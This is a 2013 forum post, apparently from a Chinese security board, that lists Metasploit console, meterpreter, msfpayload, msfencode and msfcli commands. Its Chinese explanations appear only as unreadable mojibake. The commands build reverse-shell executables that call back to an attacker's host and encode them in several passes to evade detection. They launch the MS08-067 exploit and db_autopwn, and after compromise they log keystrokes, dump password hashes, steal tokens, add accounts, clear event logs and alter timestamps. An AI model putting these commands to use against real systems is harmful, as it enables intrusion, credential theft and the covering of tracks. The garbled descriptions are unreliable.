admin ·¢±íÓÚ 2013-3-14 20:31:18

MSFÖÕ¶ËÃüÁî´óÈ«

http://pan.baidu.com/share/link?shareid=183103&uk=1110131489
show exploits
Áгömetasploit¿ò¼ÜÖеÄËùÓÐÉøÍ¸¹¥»÷Ä£¿é¡£

show payloads
Áгömetasploit¿ò¼ÜÖеÄËùÓй¥»÷ÔØºÉ¡£

show auxiliary
Áгömetasploit¿ò¼ÜÖеÄËùÓи¨Öú¹¥»÷ÔØºÉ¡£

search name
²éÕÒmetasploit¿ò¼ÜÖÐËùÓеÄÉøÍ¸¹¥»÷ºÍÆäËûÄ£¿é¡£

info
չʾ³öÖÆ¶¨ÉøÍ¸¹¥»÷»òÄ£¿éµÄÏà¹ØÐÅÏ¢¡£

use name
×°ÔØÒ»¸öÉøÍ¸¹¥»÷»òÄ£¿é¡£

LHOST
Äã±¾µØ¿ÉÒÔÈÃÄ¿±êÖ÷»úÁ¬½ÓµÄIPµØÖ·£¬Í¨³£µ±Ä¿±êÖ÷»ú²»ÔÚͬһ¸ö¾ÖÓòÍøÄÚʱ£¬¾ÍÐèÒªÊÇÒ»¸ö¹«¹²IPµØÖ·£¬ÌرðΪ·´µ¯Ê½shellʹÓá£

RHOST
Ô¶³ÌÖ÷»ú»òÊÇÄ¿±êÖ÷»ú¡£

set function
ÉèÖÃÌØ¶¨µÄÅäÖòÎÊý£¨EG£ºÉèÖñ¾µØ»òÔ¶³ÌÖ÷»ú²ÎÊý£©¡£

setg function
ÒÔÈ«¾Ö·½Ê½ÉèÖÃÌØ¶¨µÄÅäÖòÎÊý£¨EG£ºÉèÖñ¾µØ»òÔ¶³ÌÖ÷»ú²ÎÊý£©¡£

show options
Áгöij¸öÉøÍ¸¹¥»÷»òÄ£¿éÖÐËùÓеÄÅäÖòÎÊý¡£

show targets
ÁгöÉøÍ¸¹¥»÷ËùÓÐÖ§³ÖµÄÄ¿±êƽ̨¡£

set target num
Ö¸¶¨ÄãËùÖªµÀµÄÄ¿±êµÄ²Ù×÷ϵͳÒÔ¼°²¹¶¡°æ±¾ÀàÐÍ¡£

set payload name
Ö¸¶¨ÏëҪʹÓõĹ¥»÷ÔØºÉ¡£

show advanced
ÁгöËùÓи߼¶ÅäÖÃÑ¡Ïî¡£

set autorunscript migrate -f.
ÔÚÉøÍ¸¹¥»÷Íê³Éºó£¬½«×Ô¶¯Ç¨ÒƵ½ÁíÒ»¸ö½ø³Ì¡£

check
¼ì²âÄ¿±êÊÇ·ñÑ¡¶¨ÉøÍ¸¹¥»÷´æÔÚÏàÓ¦µÄ°²È«Â©¶´¡£

exploit
Ö´ÐÐÉøÍ¸¹¥»÷»òÄ£¿éÀ´¹¥»÷Ä¿±ê¡£

exploit -j
Ôڼƻ®ÈÎÎñϽøÐÐÉøÍ¸¹¥»÷£¨¹¥»÷½«ÔÚºǫ́½øÐУ©¡£

exploit -z
ÉøÍ¸¹¥»÷Íê³Éºó²»Óë»Ø»°½øÐн»»¥¡£

exploit -e encoder
ÖÆ¶¨Ê¹ÓõĹ¥»÷ÔØºÉ±àÂ뷽ʽ£¨EG£ºexploit -e shikata_ga_nai£©¡£

exploit -h
ÁгöexploitÃüÁîµÄ°ïÖúÐÅÏ¢¡£

sessions -l
Áгö¿ÉÓõĽ»»¥»á»°£¨ÔÚ´¦Àí¶à¸öshellʱʹÓã©¡£

sessions -l -v
ÁгöËùÓпÉÓõĽ»»¥»á»°ÒÔ¼°ÏêϸÐÅÏ¢£¬EG£º¹¥»÷ϵͳʱʹÓÃÁËÄĸö°²È«Â©¶´¡£

sessions -s script
ÔÚËùÓлîÔ¾µÄmetasploit»á»°ÖÐÔËÐÐÒ»¸öÌØ¶¨µÄmetasploit½Å±¾¡£

sessions -K
ɱËÀËùÓлîÔ¾µÄ½»»¥»á»°¡£

sessions -c cmd
ÔÚËùÓлîÔ¾µÄmetasploit»á»°ÉÏÖ´ÐÐÒ»¸öÃüÁî¡£

sessions -u sessionID
Éý¼¶Ò»¸öÆÕͨµÄwin32 shellµ½metasploit shell¡£

db_create name
´´½¨Ò»¸öÊý¾Ý¿âÇý¶¯¹¥»÷ËùҪʹÓõÄÊý¾Ý¿â£¨EG£ºdb_create autopwn£©¡£

db_connect name
´´½¨²¢Á¬½ÓÒ»¸öÊý¾Ý¿âÇý¶¯¹¥»÷ËùҪʹÓõÄÊý¾Ý¿â£¨EG£ºdb_connect user:passwd@ip/sqlname£©¡£

db_namp
ÀûÓÃnmap²¢°ÑɨÃèÊý¾Ý´æ´¢µ½Êý¾Ý¿âÖУ¨Ö§³ÖÆÕͨµÄnmapÓï¾ä£¬EG£º-sT -v -P0£©¡£

db_autopwn -h
չʾ³ödb_autopwnÃüÁîµÄ°ïÖúÐÅÏ¢¡£

db_autopwn -p -r -e
¶ÔËùÓз¢ÏֵĿª·Å¶Ë¿ÚÖ´ÐÐdb_autopwn£¬¹¥»÷ËùÓÐϵͳ£¬²¢Ê¹ÓÃÒ»¸ö·´µ¯Ê½shell¡£

db_destroy
ɾ³ýµ±Ç°Êý¾Ý¿â¡£

db_destroy user£ºpasswd@host£ºport/database
ʹÓø߼¶Ñ¡ÏîÀ´É¾³ýÊý¾Ý¿â¡£

***metasploitÃüÁî***
help
´ò¿ªmeterpreterʹÓðïÖú¡£

run scriptname
ÔËÐÐmeterpreter½Å±¾£¬ÔÚscripts/meterpreterĿ¼Ï¿ɲ鿴µ½ËùÓнű¾Ãû¡£

sysinfo
ÁгöÊÜ¿ØÖ÷»úµÄϵͳÐÅÏ¢¡£

ls
ÁгöÄ¿±êÖ÷»úµÄÎļþºÍÎļþ¼ÐÐÅÏ¢¡£

use priv
¼ÓÔØÌØÈ¨ÌáÉýÀ©Õ¹Ä£¿é£¬À´À©Õ¹metasploit¿â¡£

ps
ÏÔʾËùÓÐÔËÐеĽø³ÌÒÔ¼°Ïà¹ØÁªµÄÓû§ÕË»§¡£

migrate PID
Ç¨ÒÆµ½Ò»¸öÖ¸¶¨µÄ½ø³ÌID£¨PIDºÅ¿Éͨ¹ýpsÃüÁî´ÓÖ÷»úÉÏ»ñµÃ£©¡£

use incognito
¼ÓÔØincognito¹¦ÄÜ£¨ÓÃÀ´µÁÇÔÄ¿±êÖ÷»úµÄÁîÅÆ»ò¼ÙðÓû§£©

list_tokens -u
ÁгöÄ¿±êÖ÷»úÓû§µÄ¿ÉÓÃÁîÅÆ¡£

list_tokens -g
ÁгöÄ¿±êÖ÷»úÓû§×éµÄ¿ÉÓÃÁîÅÆ¡£

impersonate_token DOMAIN_NAME\\USERNAME
¼ÙðĿ±êÖ÷»úÉϵĿÉÓÃÁîÅÆ¡£

steal_token PID
µÁÇÔ¸ø¶¨½ø³ÌµÄ¿ÉÓÃÁîÅÆ²¢½øÐÐÁîÅÆ¼Ùð¡£

drop_token
Í£Ö¹¼Ùðµ±Ç°ÁîÅÆ¡£

getsystem
ͨ¹ý¸÷ÖÖ¹¥»÷ÏòÁ¿À´ÌáÉýϵͳÓû§È¨ÏÞ¡£

execute -f cmd.exe -i
Ö´ÐÐcmd.exeÃüÁî²¢½øÐн»»¥¡£

execute -f cmd.exe -i -t
ÒÔËùÓпÉÓÃÁîÅÆÀ´Ö´ÐÐcmdÃüÁî²¢Òþ²Ø¸Ã½ø³Ì¡£

rev2self
»Øµ½¿ØÖÆÄ¿±êÖ÷»úµÄ³õʼÓû§ÕË»§Ï¡£

reg command
ÔÚÄ¿±êÖ÷»ú×¢²á±íÖнøÐн»»¥£¬´´½¨£¬É¾³ý£¬²éѯµÈ²Ù×÷¡£

setdesktop number
Çл»µ½ÁíÒ»¸öÓû§½çÃæ£¨¸Ã¹¦ÄÜ»ùÓÚÄÇЩÓû§ÒѵǼ£©¡£

screenshot
¶ÔÄ¿±êÖ÷»úµÄÆÁÄ»½øÐнØÍ¼¡£

upload file
ÏòÄ¿±êÖ÷»úÉÏ´«Îļþ¡£

download file
´ÓÄ¿±êÖ÷»úÏÂÔØÎļþ¡£

keyscan_start
Õë¶ÔÔ¶³ÌÄ¿±êÖ÷»ú¿ªÆô¼üÅ̼Ǽ¹¦ÄÜ¡£

keyscan_dump
´æ´¢Ä¿±êÖ÷»úÉϲ¶»ñµÄ¼üÅ̼Ǽ¡£

keyscan_stop
Í£Ö¹Õë¶ÔÄ¿±êÖ÷»úµÄ¼üÅ̼Ǽ¡£

getprivs
¾¡¿ÉÄܶàµÄ»ñȡĿ±êÖ÷»úÉϵÄÌØÈ¨¡£

uictl enable keyboard/mouse
½Ó¹ÜÄ¿±êÖ÷»úµÄ¼üÅ̺ÍÊó±ê¡£

background
½«Ä㵱ǰµÄmetasploit shellתΪºǫִ́ÐС£

hashdump
µ¼³öÄ¿±êÖ÷»úÖеĿÚÁî¹þÏ£Öµ¡£

use sniffer
¼ÓÔØÐá̽ģʽ¡£

sniffer_interfaces
ÁгöÄ¿±êÖ÷»úËùÓпª·ÅµÄÍøÂç¶Ë¿Ú¡£

sniffer_dump interfaceID pcapname
ÔÚÄ¿±êÖ÷»úÉÏÆô¶¯Ðá̽¡£

sniffer_start interfaceID packet-buffer
ÔÚÄ¿±êÖ÷»úÉÏÕë¶ÔÌØ¶¨·¶Î§µÄÊý¾Ý°ü»º³åÇøÆô¶¯Ðá̽¡£

sniffer_stats interfaceID
»ñÈ¡ÕýÔÚʵʩÐáÌ½ÍøÂç½Ó¿ÚµÄͳ¼ÆÊý¾Ý¡£

sniffer_stop interfaceID
Í£Ö¹Ðá̽¡£

add_user username password -h ip
ÔÚÔ¶³ÌÄ¿±êÖ÷»úÉÏÌí¼ÓÒ»¸öÓû§¡£

clearev
Çå³þÄ¿±êÖ÷»úÉϵÄÈÕÖ¾¼Ç¼¡£

timestomp
ÐÞ¸ÄÎļþÊôÐÔ£¬ÀýÈçÐÞ¸ÄÎļþµÄ´´½¨Ê±¼ä£¨·´È¡Ö¤µ÷²é£©¡£

reboot
ÖØÆôÄ¿±êÖ÷»ú¡£

***MSFpayloadÃüÁî***
msfpayload -h
msfpayloadµÄ°ïÖúÐÅÏ¢¡£

msfpayload windows/meterpreter/bind_tcp O
ÁгöËùÓÐwindows/meterpreter/bind_tcpÏ¿ÉÓõĹ¥»÷ÔØºÉµÄÅäÖÃÏÈκι¥»÷ÔØºÉ¶¼ÊÇ¿ÉÓÃÅäÖõģ©¡£

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe
´´½¨Ò»¸ömetasploitµÄreverse_tcp¹¥»÷ÔØºÉ£¬»ØÁ¬µ½LHOSTipµÄLPORT£¬½«Æä±£´æÎªÃûΪpayload.exeµÄwindowsÏ¿ÉÖ´ÐгÌÐò¡£

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw
´´½¨Ò»¸ömetasploitµÄreverse_tcp¹¥»÷ÔØºÉ£¬»ØÁ¬µ½LHOSTipµÄLPORT£¬½«Æä±£´æÎªÃûΪpayload.raw£¬¸ÃÎļþºóÃæµÄmsffencodeÖÐʹÓá£

msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c
´´½¨Ò»¸ömetasploitµÄreverse_tcp¹¥»÷ÔØºÉ£¬µ¼³öC¸ñʽµÄshellcode¡£

msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java
´´½¨Ò»¸ömetasploitµÄreverse_tcp¹¥»÷ÔØºÉ£¬µ¼³ö³ÉÒÔ%u±àÂ뷽ʽµÄjavaScriptÓïÑÔ×Ö·û´®¡£

***msfencodeÃüÁî***
mefencode -h
ÁгömsfencodeµÄ°ïÖúÃüÁî¡£

msfencode -l
ÁгöËùÓпÉÓõıàÂëÆ÷¡£

msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)
ÏÔʾ±àÂ뻺³åÇøµÄ¸ñʽ¡£

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
ʹÓÃshikata_ga_nai±àÂëÆ÷¶Ôpayload.rawÎļþ½øÐÐ5±àÂ룬Ȼºóµ¼³öÒ»¸öÃûΪencoded_payload.exeµÄÎļþ¡£

msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
´´½¨Ò»¸ö¾­¹ý¶àÖÖ±àÂë¸ñʽǶÌ×±àÂëµÄ¹¥»÷ÔØºÉ¡£

msfencode -i payload.raw BufferRegister=ESI -e x86/alpja_mixed -t c
´´½¨Ò»¸ö´¿×ÖĸÊý×ÖµÄshellcode£¬ÓÉESI¼Ä´æÆ÷Ö»Ïëshellcode£¬ÒÔCÓïÑÔ¸ñʽÊä³ö¡£

***MSFcliÃüÁî***
msfcli | grep exploit
½öÁгöÉøÍ¸¹¥»÷Ä£¿é¡£

msfcli | grep exploit/windows
½öÁгöÓëwindowsÏà¹ØµÄÉøÍ¸¹¥»÷Ä£¿é¡£

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
¶ÔIP·¢Æðms08_067_netapiÉøÍ¸¹¥»÷£¬ÅäÖÃÁËbind_tcp¹¥»÷ÔØºÉ£¬²¢°ó¶¨ÔÚPORT¶Ë¿Ú½øÐмàÌý¡£

Ò³: [1]
²é¿´ÍêÕû°æ±¾: MSFÖÕ¶ËÃüÁî´óÈ«